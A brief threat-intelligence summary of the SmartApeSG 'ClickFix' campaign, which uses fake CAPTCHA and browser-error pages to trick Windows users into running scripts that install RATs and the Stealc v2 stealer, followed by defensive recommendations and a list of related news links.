Published June 2, 2026
The SmartApeSG threat actor group is executing a high-severity social engineering campaign leveraging "ClickFix" scripts to compromise Windows environments. By deploying deceptive browser error messages, fake CAPTCHA prompts, and fraudulent verification pages, the actors manipulate users into executing malicious scripts through manual interaction. These scripts facilitate the deployment of diverse high-impact payloads, specifically Remcos RAT, NetSupport RAT, and the Stealc v2 information stealer. Successful infection provides attackers with persistent remote system control, capabilities for large-scale credential harvesting, and a critical foothold for lateral movement within enterprise networks.
- Campaign Overview
- SmartApeSG has resurfaced with a renewed focus on targeting Windows-based enterprise and consumer environments.
- The campaign is characterized by sophisticated social engineering designed to bypass automated perimeter security controls.
- Attack Vector: ClickFix Mechanics
- Deceptive Interfaces: Employs fraudulent CAPTCHA prompts and fake browser error/verification pages to induce user action.
- Manual Execution: Tricks victims into manually running malicious scripts under the guise of "fixing" a technical error.
- Evasion Techniques: Utilizes custom obfuscation to hinder detection by signature-based security products.
- Payload Analysis & Impact
- Malware Delivery: Deploys highly effective Remote Access Trojans (Remcos, NetSupport) and Stealc v2.
- Remote Access: RAT deployment grants attackers persistent, unauthorized control over compromised systems.
- Data Exfiltration: Stealer components facilitate the theft of sensitive credentials and localized enterprise data.
- Defensive Strategies
- Endpoint Detection: Prioritize EDR/XDR monitoring for unauthorized script execution and anomalous RAT behavior.
- User Awareness: Train staff to recognize and report deceptive web-based prompts and manual script instructions.
- Network Monitoring: Monitor for outbound C2 traffic associated with known RAT frameworks and info-stealer activity.
Related posts
- Blog
- Cybersecurity News — SmartApeSG Campaign Uses ClickFix Scripts to Infect Windows Hosts With RAT Malware
- Isc
- Radar
- Cisecurity
- Broadcom
- Socprime
- Clavister
- Blumira
- bleepingcomputer.com — Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks
- The Register - Security — Five Eyes: Watch out for odd LinkedIn connection requests, China's back on the hunt for state secrets
- techcrunch.com — Chinese spies are using LinkedIn to lure Westerners into sharing sensitive information
- Youtube
- Pbs
- Timesofindia
- Canada
- Economictimes
- Bankinfosecurity
- Cyberscoop
- Staffingindustry
- Theguardian
- Blog
- Fiia
- Pcmag
- Zscaler
- Cyberpress
- Netsecurity
- Thehackernews
- Proofpoint
- Sonicwall
- Guptadeepak
- Cybelangel
- Sentinelone
- Github
- SecurityWeek — Ghost CMS Vulnerability Exploited to Hack Over 700 Websites
- SecurityWeek — Five Eyes: Chinese Spies Target Government, Military Staff With Fake Job Opportunities
- techjacksolutions.com — UNC1069 Targets npm Ecosystem: North Korean Actors Weaponize ClickFix Playbook Against High-Impact Open Source Maintainers